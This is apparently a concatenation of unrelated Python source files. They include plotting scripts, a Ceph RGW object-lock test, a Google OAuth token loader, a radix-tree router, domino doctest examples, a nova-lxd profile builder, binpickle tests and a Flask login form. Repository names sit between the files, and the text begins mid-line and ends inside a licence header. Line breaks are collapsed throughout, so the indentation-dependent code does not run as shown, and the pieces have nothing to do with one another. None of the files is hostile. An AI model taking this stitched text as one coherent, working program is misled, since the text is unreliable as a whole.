style style.use('ggplot') plt.rcParams['axes.facecolor']='w' plt.rcParams['axes.edgecolor']='black' plt.rcParams['grid.color']='#abbbc6' from matplotlib.ticker import MultipleLocator, FormatStrFormatter, AutoMinorLocator import matplotlib.ticker as mticker import seaborn as sns import numpy as np import string from scipy import special import argparse # replace '../../fastsk.xlsx' with filepath all_data = pd.read_excel (r'fastsk.xlsx', sheet_name = 'FigureAll') count = 0 # A new large figures with 5 per row data = all_data df = pd.DataFrame(data, columns= ['Fraction', 'FastSK', 'CharCNN']) i = 0 titles, x, y1, y2 = [], [], [], [] while not df[i*5:i*5+5].empty: a = [] subset = df[i*5:i*5+5] titles.append(subset['Fraction'].values.tolist()[0]) x.append(subset['Fraction'].values.tolist()[2:]) y1.append(subset['FastSK'].values.tolist()[2:]) y2.append(subset['CharCNN'].values.tolist()[2:]) i += 1 fig, axes = plt.subplots(i//5+min(1,i%5),5, figsize=(12, 10)) plt.setp(axes, xticks=np.arange(0,1.25,.25)) for n in range(i): axes[n//5,n%5].plot(x[n],y1[n],'bo-', label = 'FastSK') axes[n//5,n%5].plot(x[n],y2[n],'ro--', label = 'charCNN') axes[n//5,n%5].set_title(titles[n]) #axes[n//5,n%5].set_yticks(np.arange(0.4,1.0,.2)) handles, labels = axes[n//5,n%5].get_legend_handles_labels() legend = fig.legend(handles, labels, prop={'size': 15}, edgecolor='black', fontsize='x-large', loc='best', bbox_to_anchor=(0.92,0.12)) fig.delaxes(axes[5,4]) fig.delaxes(axes[5,3]) # add figure axes labels fig.text(0.5, 0.00, 'Traning Size Ratio', ha='center', fontsize=15) fig.text(0.00, 0.5, 'Area Under the ROC Curve', va='center', rotation='vertical', fontsize=16) fig.tight_layout() outfile = "FigureAllFastSKvsCNNVaryTr.pdf" print("Saving to {}".format(outfile)) plt.savefig(outfile) plt.show() from contextlib import suppress from .adaptive import Adaptive from .cluster import Cluster from .local import LocalCluster from .spec import ProcessInterface, SpecCluster from .ssh import SSHCluster with suppress(ImportError): from .ssh import SSHCluster from .key import Key from .right import Right from .sma import WebConnect from ..qt.QtWebKit import QWebView, QWebSettings from qt_ace_editor import QtAceEditor class QtAceEditorView(QWebView): def __init__(self, parent=None): """ Initialize the editor window """ super(QtAceEditorView, self).__init__(parent) self.ace_editor = QtAceEditor() # XXX this is used for debugging, it should be taken out eventually self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True) self.main_frame = self.page().mainFrame() self.main_frame.addToJavaScriptWindowObject('py_ace_editor', self.ace_editor) self.ace_editor.generate_ace_event('set_text_from_js', 'getSession()', 'editor.getSession().getDocument().getValue()', 'change') self.ace_editor.generate_binding('theme_changed', 'editor', 'setTheme') self.ace_editor.generate_binding('mode_changed', 'editor.getSession()', 'setMode') self.ace_editor.generate_binding('text_changed', 'editor.getSession().doc', 'setValue') self.ace_editor.generate_binding('auto_pair_changed', 'editor', 'setBehavioursEnabled') self.ace_editor.generate_binding('font_size_changed', 'editor', 'setFontSize') self.ace_editor.generate_binding('margin_line_changed', 'editor', 'setShowPrintMargin') self.ace_editor.generate_binding('margin_line_column_changed', 'editor', 'setPrintMarginColumn') html = self.ace_editor.generate_html() self.setHtml(html) def editor(self): """ Return the ace editor """ return self.ace_editor l = [1,2,3,4,5] print(l) def mul_by2(num): return 
num*2 for result in map(mul_by2,l): print(result) rgw/v2/tests/s3_swift/test_object_lock.py """ test_object_lock.py - Test object lock configuration for bucket Usage: test_object_lock.py -c test_object_lock.yaml Operation: Create bucket with bucket lock enabled Enable object lock configuration Upload object to the bucket Upload another object in same bucket Verify new version is created for object Verify deletion of object versions are disabled """ import os import sys sys.path.append(os.path.abspath(os.path.join(__file__, "../../../.."))) import argparse import hashlib import logging import traceback import botocore.exceptions as boto3exception import v2.lib.resource_op as s3lib import v2.utils.utils as utils from v2.lib.exceptions import ( AccessDeniedObjectDeleted, ObjectVersionCountMismatch, RGWBaseException, TestExecError, ) from v2.lib.manage_data import io_generator from v2.lib.resource_op import Config from v2.lib.rgw_config_opts import CephConfOp from v2.lib.s3.auth import Auth from v2.lib.s3.write_io_info import BasicIOInfoStructure, IOInfoInitialize from v2.tests.s3_swift import reusable from v2.tests.s3cmd.reusable import get_rgw_ip_and_port from v2.utils.log import configure_logging from v2.utils.test_desc import AddTestInfo from v2.utils.utils import RGWService log = logging.getLogger() TEST_DATA_PATH = None password = "".encode("") encryption_key = hashlib.md5(password).hexdigest() def test_exec(config): io_info_initialize = IOInfoInitialize() basic_io_structure = BasicIOInfoStructure() io_info_initialize.initialize(basic_io_structure.initial()) ceph_conf = CephConfOp() rgw_service = RGWService() # create user all_users_info = s3lib.create_users(config.user_count) for each_user in all_users_info: # authentication auth = Auth(each_user, ssl=config.ssl) s3_conn_client = auth.do_auth_using_client() # create buckets with object lock configuration if config.test_ops["create_bucket"] is True: log.info(f"no of buckets to create: {config.bucket_count}") for bc in range(config.bucket_count): bucket_name_to_create = utils.gen_bucket_name_from_userid( each_user["user_id"], rand_no=bc ) log.info(f"creating bucket with name: {bucket_name_to_create}") rgw_ip_and_port = get_rgw_ip_and_port() s3_conn_client.create_bucket( Bucket=bucket_name_to_create, ObjectLockEnabledForBucket=True ) # put object lock configuration for bucket s3_conn_client.put_object_lock_configuration( Bucket=bucket_name_to_create, ObjectLockConfiguration={ "ObjectLockEnabled": "Enabled", "Rule": {"DefaultRetention": {"Mode": "COMPLIANCE", "Days": 1}}, }, ) if config.test_ops["create_object"] is True: # uploading data log.info(f"s3 objects to create: {config.objects_count}") for oc, size in list(config.mapped_sizes.items()): s3_object_name = utils.gen_s3_object_name( bucket_name_to_create, 0 ) log.info(f"s3 object name: {s3_object_name}") s3_object_path = os.path.join(TEST_DATA_PATH, s3_object_name) log.info(f"s3 object path: {s3_object_path}") log.info("upload type: normal") io_generator(TEST_DATA_PATH + "/" + s3_object_name, size) s3_conn_client.put_object( Body=TEST_DATA_PATH + "/" + s3_object_name, Bucket=bucket_name_to_create, Key=s3_object_name, ) log.info("Verify version count") # Verify version count versions = s3_conn_client.list_object_versions( Bucket=bucket_name_to_create ) versions_count = len(versions["Versions"]) error_message = ( f"Expected: {config.objects_count}, Actual: {versions_count}" ) if versions_count == config.objects_count: log.info("Expected and actual version count is same") else: raise 
ObjectVersionCountMismatch(error_message) # Verify delete disabled for object log.info("Verify delete disabled for object") for version_dict in versions["Versions"]: try: s3_conn_client.delete_object( Bucket=bucket_name_to_create, Key=s3_object_name, VersionId=version_dict["VersionId"], ) raise AccessDeniedObjectDeleted( "Access denied object deleted" ) except boto3exception.ClientError as e: expected_code = "AccessDenied" actual_code = e.response["Error"]["Code"] assert ( actual_code == expected_code ), "Expected: {expected_code}, Actual: {actual_code}" # check for any crashes during the execution crash_info = reusable.check_for_crash() if crash_info: raise TestExecError("ceph daemon crash found!") if __name__ == "__main__": test_info = AddTestInfo("create m buckets with n objects") test_info.started_info() try: project_dir = os.path.abspath(os.path.join(__file__, "../../..")) test_data_dir = "test_data" ceph_conf = CephConfOp() rgw_service = RGWService() TEST_DATA_PATH = os.path.join(project_dir, test_data_dir) log.info("TEST_DATA_PATH: {TEST_DATA_PATH}") if not os.path.exists(TEST_DATA_PATH): log.info("test data dir not exists, creating.. ") os.makedirs(TEST_DATA_PATH) usage = """ Usage: python3 test_object_lock.py -c test_object_lock.yaml """ parser = argparse.ArgumentParser(description=usage) parser.add_argument("-c", dest="config", help=usage) parser.add_argument( "-log_level", dest="log_level", help="Set Log Level [DEBUG, INFO, WARNING, ERROR, CRITICAL]", default="info", ) # ch.setLevel(logging.getLevelName(console_log_level.upper())) args = parser.parse_args() yaml_file = args.config log_f_name = os.path.basename(os.path.splitext(yaml_file)[0]) configure_logging(f_name=log_f_name, set_level=args.log_level.upper()) config = Config(yaml_file) config.read() if config.mapped_sizes is None: config.mapped_sizes = utils.make_mapped_sizes(config) test_exec(config) test_info.success_status("test passed") sys.exit(0) except (RGWBaseException, Exception) as e: log.info(e) log.info(traceback.format_exc()) test_info.failed_status("test failed") sys.exit(1) MichaelGuldborg/Web-scraping import os.path import pickle from google.auth.transport.requests import Request from google_auth_oauthlib.flow import InstalledAppFlow # If modifying these scopes, delete the file token.pickle. SCOPES = ['https://www.googleapis.com/auth/calendar.readonly'] def fetch_credentials(): creds = None # The file token.pickle stores the user's access and refresh tokens, and is # created automatically when the authorization flow completes for the first # time. if os.path.exists('token.pickle'): with open('token.pickle', 'rb') as token: creds = pickle.load(token) # If there are no (valid) credentials available, let the user log in. 
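# If a refresh token was cached, the expired credentials below are refreshed silently;
# otherwise InstalledAppFlow starts a browser-based consent flow against credentials.json,
# and whatever credentials result are pickled back to token.pickle for the next run.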
if not creds or not creds.valid: if creds and creds.expired and creds.refresh_token: creds.refresh(Request()) else: flow = InstalledAppFlow.from_client_secrets_file( 'credentials.json', SCOPES) creds = flow.run_local_server() # Save the credentials for the next run with open('token.pickle', 'wb') as token: pickle.dump(creds, token) return creds DeanCivlin/AcadeMe1-10 from django.apps import AppConfig class AcademedataConfig(AppConfig): name = 'AcadeMeData' import logging import os from pathlib import Path from unittest import mock from unittest import TestCase from click.testing import CliRunner from xsdata import cli from xsdata.logger import logger from xsdata.transformer import SchemaTransformer root = Path(__file__).parent.parent fixtures = root.joinpath("tests/fixtures/defxmlschema") os.chdir(root) class CliTests(TestCase): def setUp(self): self.runner = CliRunner() super(CliTests, self).setUp() @mock.patch.object(SchemaTransformer, "process") @mock.patch.object(SchemaTransformer, "__init__", return_value=None) def test_default_output(self, mock_transformer_init, *args): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke(cli, [str(source), "--package", "foo"]) self.assertIsNone(result.exception) mock_transformer_init.assert_called_once_with(output="pydata", print=False) @mock.patch.object(SchemaTransformer, "process") @mock.patch.object(SchemaTransformer, "__init__", return_value=None) def test_custom_output(self, mock_transformer_init, *args): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke( cli, [str(source), "--package", "foo", "--output", "plantuml"] ) self.assertIsNone(result.exception) mock_transformer_init.assert_called_once_with(output="plantuml", print=False) @mock.patch.object(SchemaTransformer, "process") @mock.patch.object(SchemaTransformer, "__init__", return_value=None) def test_print_mode(self, mock_transformer_init, *args): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke(cli, [str(source), "--package", "foo", "--print"]) self.assertIsNone(result.exception) mock_transformer_init.assert_called_once_with(output="pydata", print=True) self.assertEqual(logging.ERROR, logger.getEffectiveLevel()) @mock.patch.object(SchemaTransformer, "process") def test_with_single_definition(self, mock_transformer_process): source = fixtures.joinpath("chapter02/example0202.xsd") result = self.runner.invoke( cli, [str(source.relative_to(root)), "--package", "foo"] ) self.assertIsNone(result.exception) mock_transformer_process.assert_called_once_with([source], "foo") @mock.patch.object(SchemaTransformer, "process") def test_with_multiple_definitions(self, mock_transformer_process): first_source = fixtures.joinpath("chapter02/example0202.xsd") second_source = fixtures.joinpath("chapter02/example0206.xsd") result = self.runner.invoke( cli, [ str(first_source.relative_to(root)), str(second_source.relative_to(root)), "--package", "foo", ], ) self.assertIsNone(result.exception) mock_transformer_process.assert_called_once_with( [first_source, second_source], "foo" ) @mock.patch.object(SchemaTransformer, "process") def test_with_directory(self, mock_transformer_process): first_source = fixtures.joinpath("chapter01") second_source = fixtures.joinpath("chapter02/example0206.xsd") result = self.runner.invoke( cli, [str(first_source), str(second_source), "--package", "foo"] ) self.assertIsNone(result.exception) schemas = list(first_source.glob("*.xsd")) schemas.append(second_source) 
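# i.e. the CLI is expected to expand a directory argument into every *.xsd file it
# contains (plus the explicitly listed schema) before handing them to SchemaTransformer.process.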
mock_transformer_process.assert_called_once_with(schemas, "foo") # -*- coding: utf-8 -*- # Generated by Django 1.10.8 on 2017-10-10 13:54 from __future__ import unicode_literals from django.db import migrations, models def migrate_projects(apps, schema_editor): ProjectsContent = apps.get_model('cms', 'ProjectsContent') for project_block in ProjectsContent.objects.all(): project_block.new_projects = project_block.projects.projects.all() project_block.save() class Migration(migrations.Migration): dependencies = [ ('cms', '0030_migrate_projects_1'), ] operations = [ migrations.AlterModelManagers( name='ProjectsContent', managers=[ ('objects', models.manager.Manager()), ], ), migrations.RunPython(migrate_projects), ] # -*- coding: utf-8 -*- """ Radix Tree in Python """ class RadixTreeNode(object): def __init__(self, path=None, handler=None, methods=None): self.path = path self.methods = {} self.children = [] self.indices = str() self.size = 0 self.addMethods(methods, handler) def __repr__(self): return (''.format(self.path, self.methods, self.indices, self.children)) def addMethods(self, methods, handler): if not methods: return if not isinstance(methods, (list, tuple, set)): methods = [methods] for method in methods: if method in self.methods and self.methods[method] != handler: raise KeyError( '{} conflicts with existed handler ' '{}'.format(handler, self.methods[method])) self.methods[method] = handler def bisect(self, target): low, high = 0, self.size while low < high: mid = low + high >> 1 if self.indices[mid] < target: low = mid + 1 else: high = mid return low def insertChild(self, index, child): pos = self.bisect(index) self.indices = self.indices[:pos] + index + self.indices[pos:] self.children.insert(pos, child) self.size += 1 return child def getChild(self, index): for i, char in enumerate(self.indices): if char == index: return self.children[i] class RadixTree(object): def __init__(self): self.root = RadixTreeNode() def __repr__(self): return repr(self.root) def insert(self, key, handler, methods): i, n, root = 0, len(key), self.root getPosition = lambda i: n if i == -1 else i while i < n: conflict, num = [], (key[i] == ':') + (root.indices == ':') if (root.indices == '*' or key[i] == '*' and root.indices or num == 1 or num == 2 and key[i + 1:getPosition( key.find('/', i))] != root.getChild(':').path): conflict = [key[:i] + p for p in self.traverse(root)] if conflict: raise Exception('"{}" conflicts with {}'.format(key, conflict)) child = root.getChild(key[i]) if child is None: pos = getPosition(key.find(':', i)) if pos == n: pos = getPosition(key.find('*', i)) if pos == n: root.insertChild( key[i], RadixTreeNode(key[i:], handler, methods)) return root = root.insertChild(key[i], RadixTreeNode(key[i:pos])) root.insertChild( '*', RadixTreeNode(key[pos + 1:], handler, methods)) return root = root.insertChild(key[i], RadixTreeNode(key[i:pos])) i = getPosition(key.find('/', pos)) root = root.insertChild(':', RadixTreeNode(key[pos + 1:i])) if i == n: root.addMethods(methods, handler) else: root = child if key[i] == ':': i += len(root.path) + 1 if i == n: root.addMethods(methods, handler) else: j, m = 0, len(root.path) while i < n and j < m and key[i] == root.path[j]: i += 1 j += 1 if j < m: child = RadixTreeNode(root.path[j:]) child.methods = root.methods child.children = root.children child.indices = root.indices child.size = root.size root.path = root.path[:j] root.methods = {} root.children = [child] root.indices = child.path[0] root.size = 1 if i == n: root.addMethods(methods, 
handler) def get(self, key, method): i, n, root, params = 0, len(key), self.root, {} while i < n: if root.indices == ':': root, pos = root.children[0], key.find('/', i) if pos == -1: pos = n params[root.path], i = key[i:pos], pos elif root.indices == '*': root = root.children[0] params[root.path] = key[i:] break else: root = root.getChild(key[i]) if root is None: return False, None, {} pos = i + len(root.path) if key[i:pos] != root.path: return False, None, {} i = pos return True, root.methods.get(method, None), params def traverse(self, root): r = [] for i, char in enumerate(root.indices): child = root.children[i] path = '{}{}'.format( char if char in [':', '*'] else '', child.path) if child.methods and child.indices: r.append([path]) r.append([path + p for p in self.traverse(child) or ['']]) return sum(r, []) #!/usr/bin/env python3.7 """ Mastering Object-Oriented Python 2e Code Examples for Mastering Object-Oriented Python 2nd Edition Chapter 15. Example 2. """ from typing import ( NamedTuple, List, Type, Optional, Iterator, Tuple, DefaultDict, Union, cast, Any, ) import random from collections import defaultdict # Duck Typing from typing import NamedTuple class Domino_1(NamedTuple): v1: int v2: int @property def double(self) -> bool: return self.v1 == self.v2 @property def score(self) -> int: return self.v1 + self.v2 from dataclasses import dataclass @dataclass(frozen=True, eq=True, order=True) class Domino_2: v1: int v2: int @property def double(self) -> bool: return self.v1 == self.v2 @property def score(self) -> int: return self.v1 + self.v2 Domino = Union[Domino_1, Domino_2] def builder(v1: int, v2: int) -> Domino: return Domino_2(v1, v2) test_dominoe_classes = """ >>> d_1a = Domino_1(6, 5) >>> d_1b = Domino_1(6, 5) >>> d_1a == d_1b True >>> d_1a.double False >>> d_1a.score 11 >>> d_2a = Domino_2(5, 3) >>> d_2b = Domino_2(5, 3) >>> d_2a == d_2b True >>> d_2a.double False >>> d_2a.score 8 """ # More Complex Example class Hand(list): def __init__(self, *args: Domino) -> None: super().__init__(cast(Tuple[Any], args)) def score(self) -> int: return sum(d.score for d in self) def rank(self) -> None: self.sort(key=lambda d: d.score, reverse=True) def doubles(self) -> List[Domino_1]: return [d for d in self if d.double] def highest_double(self) -> Optional[Domino_1]: descending = sorted(self.doubles(), key=lambda d: d.v1, reverse=True) if descending: return descending[0] return None class DominoBoneYard: domino_class: Type[Domino] = Domino_1 hand_class: Type[Hand] = Hand hand_size: int = 7 def __init__(self, limit: int = 6) -> None: self._dominoes: List[Domino] = [ self.domino_class(x, y) for x in range(limit + 1) for y in range(x + 1) ] random.shuffle(self._dominoes) def draw(self, n: int = 1) -> Optional[List[Domino]]: deal, remainder = self._dominoes[:n], self._dominoes[n:] if len(deal) != n: return None self._dominoes = remainder return deal def hand_iter(self, players: int = 4) -> Iterator[Hand]: hands: List[Optional[List[Domino]]] = [ self.draw(self.hand_size) for _ in range(players) ] if not all(hands): raise ValueError(f"Can't deal {self.hand_size} tiles to {players} players") yield from (self.hand_class(*h) for h in hands if h is not None) test_dby = """ >>> random.seed(42) >>> DominoBoneYard.hand_class = Hand >>> dby = DominoBoneYard() >>> len(dby._dominoes) 28 >>> hands = list(dby.hand_iter(4)) >>> hands[0] [Domino_1(v1=5, v2=3), Domino_1(v1=5, v2=1), Domino_1(v1=4, v2=0), Domino_1(v1=6, v2=0), Domino_1(v1=6, v2=6), Domino_1(v1=3, v2=0), Domino_1(v1=2, v2=2)] >>> 
hands[0].score() 43 >>> hd = hands[0].highest_double() >>> hd Domino_1(v1=6, v2=6) >>> hands[1] [Domino_1(v1=4, v2=1), Domino_1(v1=4, v2=4), Domino_1(v1=3, v2=3), Domino_1(v1=6, v2=3), Domino_1(v1=4, v2=2), Domino_1(v1=5, v2=4), Domino_1(v1=5, v2=0)] """ test_dby_exception = """ >>> random.seed(42) >>> DominoBoneYard.hand_class = Hand >>> dby = DominoBoneYard() >>> hands = list(dby.hand_iter(5)) # doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): File "/Users/slott/miniconda3/envs/mastering/lib/python3.7/doctest.py", line 1329, in __run compileflags, 1), test.globs) File "", line 1, in hands = list(dby.hand_iter(5)) File "/Users/slott/Documents/.../mastering-oo-python-2e/Chapter_15/ch15_ex2.py", line 119, in hand_iter raise ValueError(f"Can't deal {self.hand_size} tiles to {players} players") ValueError: Can't deal 7 tiles to 5 players """ class Hand_X1(Hand): def __init__(self, *args) -> None: super().__init__(*args) self.end: DefaultDict[int, List[Domino_1]] = defaultdict(list) for d in self: self.end[d.v1].append(d) self.end[d.v2].append(d) def matches(self, spots: int) -> List[Domino_1]: return self.end.get(spots, []) test_dby_3 = """ >>> random.seed(42) >>> DominoBoneYard.hand_class = Hand_X1 >>> DominoBoneYard.domino_class = Domino_2 >>> dby = DominoBoneYard() >>> len(dby._dominoes) 28 >>> hands = list(dby.hand_iter(4)) >>> h_0 = hands[0] >>> h_0 [Domino_2(v1=5, v2=3), Domino_2(v1=5, v2=1), Domino_2(v1=4, v2=0), Domino_2(v1=6, v2=0), Domino_2(v1=6, v2=6), Domino_2(v1=3, v2=0), Domino_2(v1=2, v2=2)] >>> h_0.score() 43 >>> h_0.matches(3) [Domino_2(v1=5, v2=3), Domino_2(v1=3, v2=0)] """ __test__ = {name: value for name, value in locals().items() if name.startswith("test_")} if __name__ == "__main__": import doctest doctest.testmod(verbose=False) # Copyright 2016 Canonical Ltd # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. 
import os from nova import exception from nova import i18n from nova.virt import driver from oslo_config import cfg from oslo_utils import units from nova.virt.lxd import common from nova.virt.lxd import vif _ = i18n._ CONF = cfg.CONF def _base_config(instance, _): instance_attributes = common.InstanceAttributes(instance) return { 'environment.product_name': 'OpenStack Nova', 'raw.lxc': 'lxc.console.logfile={}\n'.format( instance_attributes.console_path), } def _nesting(instance, _): if instance.flavor.extra_specs.get('lxd:nested_allowed'): return {'security.nesting': 'True'} def _security(instance, _): if instance.flavor.extra_specs.get('lxd:privileged_allowed'): return {'security.privileged': 'True'} def _memory(instance, _): mem = instance.memory_mb if mem >= 0: return {'limits.memory': '{}MB'.format(mem)} def _cpu(instance, _): vcpus = instance.flavor.vcpus if vcpus >= 0: return {'limits.cpu': str(vcpus)} def _isolated(instance, client): lxd_isolated = instance.flavor.extra_specs.get('lxd:isolated') if lxd_isolated: extensions = client.host_info.get('api_extensions', []) if 'id_map' in extensions: return {'security.idmap.isolated': 'True'} else: msg = _("Host does not support isolated instances") raise exception.NovaException(msg) _CONFIG_FILTER_MAP = [ _base_config, _nesting, _security, _memory, _cpu, _isolated, ] def _root(instance, client, *_): """Configure the root disk.""" device = {'type': 'disk', 'path': '/'} # we don't do quotas if the CONF.lxd.pool is set and is dir or lvm, or if # the environment['storage'] is dir or lvm. if CONF.lxd.pool: extensions = client.host_info.get('api_extensions', []) if 'storage' in extensions: device['pool'] = CONF.lxd.pool storage_type = client.storage_pools.get(CONF.lxd.pool).driver else: msg = _("Host does not have storage pool support") raise exception.NovaException(msg) else: storage_type = client.host_info['environment']['storage'] if storage_type in ['btrfs', 'zfs']: device['size'] = '{}GB'.format(instance.root_gb) specs = instance.flavor.extra_specs # Bytes and iops are not separate config options in a container # profile - we let Bytes take priority over iops if both are set. # Align all limits to MiB/s, which should be a sensible middle road. 
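# For example (hypothetical flavor values): quota:disk_read_bytes_sec = 104857600
# (100 MiB/s) ends up as limits.read = '100MB', since 104857600 // units.Mi == 100,
# while an iops-only flavor with quota:disk_read_iops_sec = 500 yields limits.read = '500iops'.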
if specs.get('quota:disk_read_iops_sec'): device['limits.read'] = '{}iops'.format( specs['quota:disk_read_iops_sec']) if specs.get('quota:disk_write_iops_sec'): device['limits.write'] = '{}iops'.format( specs['quota:disk_write_iops_sec']) if specs.get('quota:disk_read_bytes_sec'): device['limits.read'] = '{}MB'.format( int(specs['quota:disk_read_bytes_sec']) // units.Mi) if specs.get('quota:disk_write_bytes_sec'): device['limits.write'] = '{}MB'.format( int(specs['quota:disk_write_bytes_sec']) // units.Mi) minor_quota_defined = ('limits.write' in device or 'limits.read' in device) if specs.get('quota:disk_total_iops_sec') and not minor_quota_defined: device['limits.max'] = '{}iops'.format( specs['quota:disk_total_iops_sec']) if specs.get('quota:disk_total_bytes_sec') and not minor_quota_defined: device['limits.max'] = '{}MB'.format( int(specs['quota:disk_total_bytes_sec']) // units.Mi) return {'root': device} def _ephemeral_storage(instance, client, __, block_info): instance_attributes = common.InstanceAttributes(instance) ephemeral_storage = driver.block_device_info_get_ephemerals(block_info) if ephemeral_storage: devices = {} for ephemeral in ephemeral_storage: ephemeral_src = os.path.join( instance_attributes.storage_path, ephemeral['virtual_name']) device = { 'path': '/mnt', 'source': ephemeral_src, 'type': 'disk', } if CONF.lxd.pool: extensions = client.host_info.get('api_extensions', []) if 'storage' in extensions: device['pool'] = CONF.lxd.pool else: msg = _("Host does not have storage pool support") raise exception.NovaException(msg) devices[ephemeral['virtual_name']] = device return devices def _network(instance, _, network_info, __): if not network_info: return devices = {} for vifaddr in network_info: cfg = vif.get_config(vifaddr) devname = vif.get_vif_devname(vifaddr) key = devname devices[key] = { 'nictype': 'physical', 'hwaddr': str(cfg['mac_address']), 'parent': vif.get_vif_internal_devname(vifaddr), 'type': 'nic' } specs = instance.flavor.extra_specs # Since LXD does not implement average NIC IO and number of burst # bytes, we take the max(vif_*_average, vif_*_peak) to set the peak # network IO and simply ignore the burst bytes. # Align values to MBit/s (8 * powers of 1000 in this case), having # in mind that the values are recieved in Kilobytes/s. vif_inbound_limit = max( int(specs.get('quota:vif_inbound_average', 0)), int(specs.get('quota:vif_inbound_peak', 0)), ) if vif_inbound_limit: devices[key]['limits.ingress'] = '{}Mbit'.format( vif_inbound_limit * units.k * 8 // units.M) vif_outbound_limit = max( int(specs.get('quota:vif_outbound_average', 0)), int(specs.get('quota:vif_outbound_peak', 0)), ) if vif_outbound_limit: devices[key]['limits.egress'] = '{}Mbit'.format( vif_outbound_limit * units.k * 8 // units.M) return devices _DEVICE_FILTER_MAP = [ _root, _ephemeral_storage, _network, ] def to_profile(client, instance, network_info, block_info, update=False): """Convert a nova flavor to a lxd profile. Every instance container created via nova-lxd has a profile by the same name. The profile is sync'd with the configuration of the container. When the instance container is deleted, so is the profile. 
""" name = instance.name config = {} for f in _CONFIG_FILTER_MAP: new = f(instance, client) if new: config.update(new) devices = {} for f in _DEVICE_FILTER_MAP: new = f(instance, client, network_info, block_info) if new: devices.update(new) if update is True: profile = client.profiles.get(name) profile.devices = devices profile.config = config profile.save() return profile else: return client.profiles.create(name, config, devices) PipeGen/pipeline-generator import pandas as pd import pickle import json import os # from .var_dict import VarDict def find_in_vardict(vardict, name): for x in vardict.var_dict: if x["variable_name"] == name: return x def check_for_df(vardict, var_name): flag = 0 for x in vardict.var_dict: if ((x["variable_name"] == var_name) and (x["type"]==pd.DataFrame)): flag = 1 if flag==0: return False return True def save_file(f): with open('./media/' + f.name, 'wb+') as destination: for chunk in f.chunks(): destination.write(chunk) def dump_to_pkl(obj, filename): out_file = open('./calc/json_dumps/'+filename, 'wb') pickle.dump(obj, out_file) out_file.close() def load_pkl(filename): try: with open('./calc/json_dumps/' + filename, 'rb') as infile: obj = pickle.load(infile, encoding = 'bytes') except EOFError as e: obj = None return obj def dump_to_json(obj, filename): with open('./calc/json_dumps/'+ filename + '.json','w') as json_file: json.dump(obj, json_file) def load_json(filename): try: with open('./calc/json_dumps/' + filename +'.json') as json_file: data = json.load(json_file) except EOFError as e: data = None return data def addCell(cellName): opData = [] with open('./calc/json_dumps/opdata.json', 'r') as json_file: opData = json.load(json_file) add_cell_data(opData, cellName) with open('./calc/json_dumps/opdata.json','w') as json_file: json.dump(opData, json_file) def getMediaFiles(): path = "./media/" lst = os.listdir(path) lst.remove('downloads') return lst def getContext(): context = load_pkl('context') media_files = getMediaFiles() # for list of operations opdata = load_json('opdata') # for getting variable names vardict = load_pkl('vardict') if vardict != None: varList = vardict.get_var_list() else: varList = [] context['files'] = media_files context['opdata'] = opdata context['varlist'] = varList return context def setContext(key, value): context = load_pkl('context') context[key] = value dump_to_pkl(context, 'context') return context # Function not used outside util def add_cell_data(opData, cellName): def splitName(cellData): cellType = cellData['name'].split('-')[0] if cellType == cellName: return True else: return False cells = list(filter(splitName, opData)) new_cell_idx = str(len(cells)) setContext('currentCell', cellName + "-" + new_cell_idx) opData.append({ "type" : cellName+'.html', "name" : cellName + "-" + new_cell_idx, "data" : {} }) def set_cell_data(opData, cellName, key, value): for cell in opData: if cell['name'] == cellName: cell['data'][key] = value 1-10 from pytest import raises from binpickle.format import * def test_format_sizes(): assert HEADER_FORMAT.size == 16 assert TRAILER_FORMAT.size == 16 def test_pack_default_header(): h = FileHeader() bs = h.encode() assert len(bs) == 16 def test_default_header_round_trip(): h = FileHeader() bs = h.encode() assert len(bs) == 16 h2 = FileHeader.decode(bs) assert h2 is not h assert h2 == h def test_size_round_trip(): h = FileHeader(length=57) bs = h.encode() assert len(bs) == 16 h2 = FileHeader.decode(bs) assert h2.length == 57 assert h2 == h def test_catch_bad_magic(): with raises(ValueError) as 
exc: FileHeader.decode(b'BNPQ\x00\x00\x00\x00' + (b'\x00' * 8)) assert 'magic' in str(exc.value) def test_catch_bad_version(): with raises(ValueError) as exc: FileHeader.decode(b'BPCK\x00\x02\x00\x00' + (b'\x00' * 8)) assert 'version' in str(exc.value) def test_catch_bad_padding(): with raises(ValueError) as exc: FileHeader.decode(b'BPCK\x00\x01\x00\xff' + (b'\x00' * 8)) assert 'padding' in str(exc.value) dolboBobo/python3_ios """ =========== Marker Path =========== Using a `~.path.Path` as marker for a `~.axes.Axes.plot`. """ import matplotlib.pyplot as plt import matplotlib.path as mpath import numpy as np star = mpath.Path.unit_regular_star(6) circle = mpath.Path.unit_circle() # concatenate the circle with an internal cutout of the star verts = np.concatenate([circle.vertices, star.vertices[::-1, ...]]) codes = np.concatenate([circle.codes, star.codes]) cut_star = mpath.Path(verts, codes) plt.plot(np.arange(10)**2, '--r', marker=cut_star, markersize=15) plt.show() ############################################################################# # # ------------ # # References # """""""""" # # The use of the following functions, methods, classes and modules is shown # in this example: import matplotlib matplotlib.path matplotlib.path.Path matplotlib.path.Path.unit_regular_star matplotlib.path.Path.unit_circle matplotlib.axes.Axes.plot matplotlib.pyplot.plot # app/mod_user/forms.py from flask_wtf import FlaskForm from wtforms import TextField, PasswordField from wtforms.validators import DataRequired, Email class LoginForm(FlaskForm): email = TextField('Email Address', [DataRequired(), Email()]) password = PasswordField('Password', [DataRequired()]) n = int(input()) l1 = list(map(int, input().split())) m = int(input()) l2 = list(map(int, input().split())) d = [0 for i in range(100001)] for i in range(n) : d[l1[i]] = i a = 0 b = 0 for i in range(m): a += d[l2[i]]+1 b += n-d[l2[i]] print(a,b) PiRK/silx # coding: utf-8 # /*########################################################################## # # Copyright (c) 2016-2017 European Synchrotron Radiation Facility # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all 